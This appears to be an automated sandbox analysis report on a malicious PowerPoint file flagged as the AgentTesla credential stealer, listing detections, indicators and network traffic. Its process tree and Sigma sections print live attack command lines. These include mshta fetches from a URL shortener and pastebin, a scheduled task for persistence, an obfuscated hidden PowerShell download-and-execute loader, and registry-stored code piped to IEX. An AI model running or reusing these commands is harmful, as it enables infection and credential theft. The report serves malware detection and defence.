Loading ...

Play interactive tourEdit tour

Analysis Report HHS290620-024.ppt

Overview

General Information

Sample Name:HHS290620-024.ppt
MD5:2e5faf5df0e909aa914717d2c3f62bc4
SHA1:47795bb3d37270e2882541df837360389b634152
SHA256:2af288465c8fe02c371ce137c86b8137c3c017e7a9ea94ef0aa6ac5025dca649

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Mshta Download Pastebin
Sigma detected: Powershell execute code from registry
Sigma detected: Schedule script from internet via mshta
Yara detected AgentTesla
Connects to a URL shortener service
Connects to a pastebin service (likely for C&C)
Creates a scheduled task launching mshta.exe (likely to bypass HIPS)
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Creates processes via WMI
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Adds / modifies Windows certificates
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Domain name seen in connection with other malware
Enables debug privileges
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Startup

  • System is w7
  • POWERPNT.EXE (PID: 3756 cmdline: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /AUTOMATION -Embedding MD5: 0F144ECA8CFEC8882A3809D176886255)
  • cmd.exe (PID: 3840 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\HHS290620-024.ppt' MD5: AD7B9C14083B52BC532FBA5948342B98)
    • POWERPNT.EXE (PID: 3880 cmdline: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\HHS290620-024.ppt' MD5: 0F144ECA8CFEC8882A3809D176886255)
      • mshta.exe (PID: 4004 cmdline: mshta http://%40%40%40@j.mp/sdhgas6asdasdgha MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
        • schtasks.exe (PID: 2148 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn 'win2 update' /tr '\''mshta\'http:\\pastebin.com\raw\DBMBYsw4' /F MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • mshta.exe (PID: 2128 cmdline: 'C:\Windows\System32\mshta.exe' 'http:\\pastebin.com\raw\DBMBYsw4' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
  • powershell.exe (PID: 2092 cmdline: powershell ((gp HKCU:\Software).iamresearcher)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • MSBuild.exe (PID: 2832 cmdline: {path} MD5: EDDC75B478D9F9AAF6BE7BE069298455)
  • taskeng.exe (PID: 2400 cmdline: taskeng.exe {CE29C75C-2582-4048-996B-635B65BF5C70} S-1-5-21-290172400-2828352916-2832973385-1004:computer\user:Interactive:[1] MD5: 4F2659160AFCCA990305816946F69407)
  • mshta.exe (PID: 2612 cmdline: 'C:\Windows\system32\mshta.exe' 'http:\\pastebin.com\raw\9Lm52LAJ' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
  • powershell.exe (PID: 2628 cmdline: powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg('h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/L7UDNEGk'));$_Xpin=$_Xpin.replace('.','*!(@*#(!@#*').replace('*!(@*#(!@#*','0');$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X) MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • mshta.exe (PID: 2704 cmdline: 'C:\Windows\system32\mshta.exe' 'http:\\pastebin.com\raw\fAFqQYgZ' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
  • powershell.exe (PID: 2656 cmdline: powershell ((gp HKCU:\Software).iamresearcher)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • mshta.exe (PID: 2640 cmdline: 'C:\Windows\system32\mshta.exe' 'http:\\pastebin.com\raw\z0h2yS0U' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
  • mshta.exe (PID: 3384 cmdline: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).iamresearcher)|IEX'', 0 : window.close') MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
    • powershell.exe (PID: 3412 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).iamresearcher)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000015.00000002.1220248955.00402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000015.00000002.1230994465.01C30000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: MSBuild.exe PID: 2832JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        Process Memory Space: MSBuild.exe PID: 2832JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          21.2.MSBuild.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

            Sigma Overview


            System Summary:

            barindex
            Sigma detected: Mshta Download PastebinShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\mshta.exe' 'http:\\pastebin.com\raw\DBMBYsw4', CommandLine: 'C:\Windows\System32\mshta.exe' 'http:\\pastebin.com\raw\DBMBYsw4', CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: mshta http://%40%40%40@j.mp/sdhgas6asdasdgha, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4004, ProcessCommandLine: 'C:\Windows\System32\mshta.exe' 'http:\\pastebin.com\raw\DBMBYsw4', ProcessId: 2128
            Sigma detected: Powershell execute code from registryShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).iamresearcher)|IEX, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).iamresearcher)|IEX, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).iamresearcher)|IEX'', 0 : window.close'), ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3384, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).iamresearcher)|IEX, ProcessId: 3412
            Sigma detected: Schedule script from internet via mshtaShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn 'win2 update' /tr '\''mshta\'http:\\pastebin.com\raw\DBMBYsw4' /F , CommandLine: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn 'win2 update' /tr '\''mshta\'http:\\pastebin.com\raw\DBMBYsw4' /F , CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: mshta http://%40%40%40@j.mp/sdhgas6asdasdgha, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4004, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn 'win2 update' /tr '\''mshta\'http:\\pastebin.com\raw\DBMBYsw4' /F , ProcessId: 2148
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).iamresearcher)|IEX, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).iamresearcher)|IEX, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).iamresearcher)|IEX'', 0 : window.close'), ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3384, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).iamresearcher)|IEX, ProcessId: 3412
            Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: mshta http://%40%40%40@j.mp/sdhgas6asdasdgha, CommandLine: mshta http://%40%40%40@j.mp/sdhgas6asdasdgha, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\HHS290620-024.ppt', ParentImage: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE, ParentProcessId: 3880, ProcessCommandLine: mshta http://%40%40%40@j.mp/sdhgas6asdasdgha, ProcessId: 4004

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for submitted fileShow sources
            Source: HHS290620-024.pptVirustotal: Detection: 14%Perma Link
            Machine Learning detection for sampleShow sources
            Source: HHS290620-024.pptJoe Sandbox ML: detected

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior

            Software Vulnerabilities:

            barindex
            Document exploit detected (process start blacklist hit)Show sources
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess created: C:\Windows\System32\mshta.exeJump to behavior
            Source: global trafficDNS query: name: j.mp
            Source: global trafficTCP traffic: 192.168.2.2:49159 -> 104.23.98.190:443
            Source: global trafficTCP traffic: 192.168.2.2:49158 -> 67.199.248.16:80

            Networking:

            barindex
            Connects to a URL shortener serviceShow sources
            Source: unknownDNS query: name: j.mp
            Connects to a pastebin service (likely for C&C)Show sources
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: unknownDNS query: name: pastebin.com
            Source: Joe Sandbox ViewDomain Name: j.mp j.mp
            Source: Joe Sandbox ViewIP Address: 104.23.99.190 104.23.99.190
            Source: Joe Sandbox ViewIP Address: 104.23.99.190 104.23.99.190
            Source: Joe Sandbox ViewIP Address: 67.199.248.16 67.199.248.16
            Source: Joe Sandbox ViewIP Address: 67.199.248.16 67.199.248.16
            Source: Joe Sandbox ViewIP Address: 104.23.98.190 104.23.98.190
            Source: Joe Sandbox ViewIP Address: 104.23.98.190 104.23.98.190
            Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
            Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
            Source: global trafficHTTP traffic detected: GET /sdhgas6asdasdgha HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: j.mpConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /raw/DBMBYsw4 HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pastebin.comConnection: Keep-AliveCookie: __cfduid=d0d64003ec7d772cd2c5303cf9fc4b5391593459015
            Source: global trafficHTTP traffic detected: GET /raw/9Lm52LAJ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pastebin.comConnection: Keep-AliveCookie: __cfduid=d0d64003ec7d772cd2c5303cf9fc4b5391593459015
            Source: global trafficHTTP traffic detected: GET /raw/fAFqQYgZ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pastebin.comConnection: Keep-AliveCookie: __cfduid=d0d64003ec7d772cd2c5303cf9fc4b5391593459015
            Source: global trafficHTTP traffic detected: GET /raw/z0h2yS0U HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pastebin.comConnection: Keep-AliveCookie: __cfduid=d0d64003ec7d772cd2c5303cf9fc4b5391593459015
            Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZWG4GL8S\sdhgas6asdasdgha[1].htmJump to behavior
            Source: global trafficHTTP traffic detected: GET /sdhgas6asdasdgha HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: j.mpConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /raw/DBMBYsw4 HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pastebin.comConnection: Keep-AliveCookie: __cfduid=d0d64003ec7d772cd2c5303cf9fc4b5391593459015
            Source: global trafficHTTP traffic detected: GET /raw/9Lm52LAJ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pastebin.comConnection: Keep-AliveCookie: __cfduid=d0d64003ec7d772cd2c5303cf9fc4b5391593459015
            Source: global trafficHTTP traffic detected: GET /raw/fAFqQYgZ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pastebin.comConnection: Keep-AliveCookie: __cfduid=d0d64003ec7d772cd2c5303cf9fc4b5391593459015
            Source: global trafficHTTP traffic detected: GET /raw/z0h2yS0U HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pastebin.comConnection: Keep-AliveCookie: __cfduid=d0d64003ec7d772cd2c5303cf9fc4b5391593459015
            Source: mshta.exe, 00000005.00000003.894187184.00423000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: unknownDNS traffic detected: queries for: j.mp
            Source: MSBuild.exe, 00000015.00000002.1231913015.01F1C000.00000004.00000001.sdmpString found in binary or memory: http://193.56.28.69
            Source: MSBuild.exe, 00000015.00000002.1231913015.01F1C000.00000004.00000001.sdmp, MSBuild.exe, 00000015.00000002.1221185069.005D7000.00000004.00000020.sdmpString found in binary or memory: http://193.56.28.69/webpanel-newking/inc/305e5b961ba2a8.php
            Source: MSBuild.exe, 00000015.00000002.1230994465.01C30000.00000004.00000001.sdmpString found in binary or memory: http://193.56.28.69x&7k
            Source: MSBuild.exe, 00000015.00000002.1230994465.01C30000.00000004.00000001.sdmpString found in binary or memory: http://3WRHQYmZll0gveng.com
            Source: MSBuild.exe, 00000015.00000002.1230994465.01C30000.00000004.00000001.sdmpString found in binary or memory: http://3WRHQYmZll0gveng.comx)
            Source: mshta.exe, 00000005.00000003.894126013.00401000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudFlareIncE
            Source: mshta.exe, 00000005.00000003.894126013.00401000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudFlareIncECCCA-2.crt0
            Source: mshta.exe, 00000005.00000003.894187184.00423000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: mshta.exe, 00000005.00000003.894187184.00423000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: mshta.exe, 00000005.00000003.894187184.00423000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: mshta.exe, 00000005.00000003.894187184.00423000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: mshta.exe, 00000005.00000003.894187184.00423000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: mshta.exe, 00000005.00000003.894187184.00423000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: mshta.exe, 00000005.00000003.894126013.00401000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudFlareI
            Source: mshta.exe, 00000005.00000003.894126013.00401000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudFlareIncECCCA2.crl06
            Source: mshta.exe, 00000005.00000003.894126013.00401000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
            Source: mshta.exe, 00000005.00000003.894126013.00401000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudFlareIncECCCA2
            Source: mshta.exe, 00000005.00000003.894126013.00401000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudFlareIncECCCA2.crl0L
            Source: mshta.exe, 00000005.00000003.894126013.00401000.00000004.00000001.sdmpString found in binary or memory: http://j.mp/
            Source: mshta.exe, 00000005.00000003.894126013.00401000.00000004.00000001.sdmpString found in binary or memory: http://j.mp/on
            Source: mshta.exe, 00000005.00000002.895365565.003A0000.00000004.00000020.sdmpString found in binary or memory: http://j.mp/sdhgas6asdasdgha
            Source: mshta.exe, 00000005.00000002.895365565.003A0000.00000004.00000020.sdmpString found in binary or memory: http://j.mp/sdhgas6asdasdghaeN
            Source: mshta.exe, 00000005.00000002.895365565.003A0000.00000004.00000020.sdmpString found in binary or memory: http://j.mp/sdhgas6asdasdghanN
            Source: mshta.exe, 00000005.00000003.894187184.00423000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: mshta.exe, 00000005.00000003.894187184.00423000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: mshta.exe, 00000005.00000003.894187184.00423000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: mshta.exe, 00000005.00000003.894187184.00423000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: mshta.exe, 00000005.00000003.894187184.00423000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: mshta.exe, 00000005.00000003.894126013.00401000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digi
            Source: mshta.exe, 00000005.00000003.894126013.00401000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: mshta.exe, 00000005.00000003.894126013.00401000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: mshta.exe, 00000005.00000003.894187184.00423000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: mshta.exe, 00000005.00000003.894187184.00423000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: mshta.exe, 00000010.00000002.1019048642.00083000.00000004.00000020.sdmpString found in binary or memory: http://pastebin.com/raw/9Lm52LAJ
            Source: mshta.exe, 00000010.00000003.1005397632.000A4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.1019294043.000A5000.00000004.00000001.sdmpString found in binary or memory: http://pastebin.com/raw/9Lm52LAJ%27%3A%27
            Source: mshta.exe, 00000010.00000003.1005397632.000A4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.1019848425.00110000.00000004.00000001.sdmpString found in binary or memory: http://pastebin.com/raw/9Lm52LAJ...
            Source: mshta.exe, 00000010.00000002.1019048642.00083000.00000004.00000020.sdmpString found in binary or memory: http://pastebin.com/raw/9Lm52LAJ8axf
            Source: mshta.exe, 00000010.00000003.1005397632.000A4000.00000004.00000001.sdmpString found in binary or memory: http://pastebin.com/raw/9Lm52LAJED
            Source: mshta.exe, 00000010.00000002.1019048642.00083000.00000004.00000020.sdmpString found in binary or memory: http://pastebin.com/raw/9Lm52LAJR
            Source: mshta.exe, 00000010.00000003.1005397632.000A4000.00000004.00000001.sdmpString found in binary or memory: http://pastebin.com/raw/9Lm52LAJe:
            Source: mshta.exe, 00000010.00000003.1007855649.01F02000.00000004.00000001.sdmpString found in binary or memory: http://pastebin.com/raw/9Lm52LAJhttp://pastebin.com/raw/9Lm52LAJ
            Source: mshta.exe, 00000010.00000003.1005397632.000A4000.00000004.00000001.sdmpString found in binary or memory: http://pastebin.com/raw/9Lm52LAJnnC:
            Source: mshta.exe, 0000000A.00000003.895930557.0044B000.00000004.00000001.sdmp, mshta.exe, 0000000A.00000003.896039888.003F2000.00000004.00000001.sdmp, mshta.exe, 0000000A.00000002.897048563.003C3000.00000004.00000020.sdmpString found in binary or memory: http://pastebin.com/raw/DBMBYsw4
            Source: mshta.exe, 0000000A.00000003.895930557.0044B000.00000004.00000001.sdmp, mshta.exe, 0000000A.00000003.896114143.00427000.00000004.00000001.sdmp, mshta.exe, 0000000A.00000002.897924238.00427000.00000004.00000001.sdmpString found in binary or memory: http://pastebin.com/raw/DBMBYsw4...
            Source: mshta.exe, 0000000A.00000002.897048563.003C3000.00000004.00000020.sdmpString found in binary or memory: http://pastebin.com/raw/DBMBYsw4G
            Source: mshta.exe, 0000000A.00000002.897048563.003C3000.00000004.00000020.sdmpString found in binary or memory: http://pastebin.com/raw/DBMBYsw4Q
            Source: mshta.exe, 0000000A.00000003.896338333.02000000.00000004.00000001.sdmpString found in binary or memory: http://pastebin.com/raw/DBMBYsw4http://pastebin.com/raw/DBMBYsw4
            Source: mshta.exe, 0000000A.00000003.896039888.003F2000.00000004.00000001.sdmpString found in binary or memory: http://pastebin.com/raw/DBMBYsw4nnC:
            Source: mshta.exe, 0000000A.00000002.897048563.003C3000.00000004.00000020.sdmpString found in binary or memory: http://pastebin.com/raw/DBMBYsw4o
            Source: mshta.exe, 0000000A.00000003.895930557.0044B000.00000004.00000001.sdmpString found in binary or memory: http://pastebin.com/raw/DBMBYsw4rC:
            Source: mshta.exe, 0000000A.00000002.897048563.003C3000.00000004.00000020.sdmpString found in binary or memory: http://pastebin.com/raw/DBMBYsw4y
            Source: mshta.exe, 00000013.00000003.1009853044.003C5000.00000004.00000001.sdmpString found in binary or memory: http://pastebin.com/raw/fAFqQYgZ
            Source: mshta.exe, 00000013.00000003.1009496222.0042E000.00000004.00000001.sdmpString found in binary or memory: http://pastebin.com/raw/fAFqQYgZ...G
            Source: mshta.exe, 00000013.00000003.1009853044.003C5000.00000004.00000001.sdmp, mshta.exe, 00000013.00000002.1022361478.003C5000.00000004.00000001.sdmpString found in binary or memory: http://pastebin.com/raw/fAFqQYgZ...etg
            Source: mshta.exe, 00000013.00000002.1021485758.003A3000.00000004.00000020.sdmpString found in binary or memory: http://pastebin.com/raw/fAFqQYgZA
            Source: mshta.exe, 00000013.00000003.1009853044.003C5000.00000004.00000001.sdmpString found in binary or memory: http://pastebin.com/raw/fAFqQYgZED
            Source: mshta.exe, 00000013.00000003.1011936960.027D2000.00000004.00000001.sdmpString found in binary or memory: http://pastebin.com/raw/fAFqQYgZhttp://pastebin.com/raw/fAFqQYgZ
            Source: mshta.exe, 00000013.00000003.1009853044.003C5000.00000004.00000001.sdmpString found in binary or memory: http://pastebin.com/raw/fAFqQYgZnnC:
            Source: mshta.exe, 00000013.00000003.1009632261.00433000.00000004.00000001.sdmpString found in binary or memory: http://pastebin.com/raw/fAFqQYgZrC:
            Source: mshta.exe, 00000005.00000003.894187184.00423000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: mshta.exe, 00000005.00000003.894187184.00423000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: mshta.exe, 00000005.00000003.894187184.00423000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/
            Source: mshta.exe, 00000005.00000003.894187184.00423000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/;
            Source: mshta.exe, 00000005.00000003.894187184.00423000.00000004.00000001.sdmp, sdhgas6asdasdgha[1].htm.5.drString found in binary or memory: https://pastebin.com/raw/9nU58ujw
            Source: mshta.exe, 00000005.00000003.894187184.00423000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/9nU58ujw...
            Source: mshta.exe, 00000005.00000002.895365565.003A0000.00000004.00000020.sdmpString found in binary or memory: https://pastebin.com/raw/9nU58ujw9
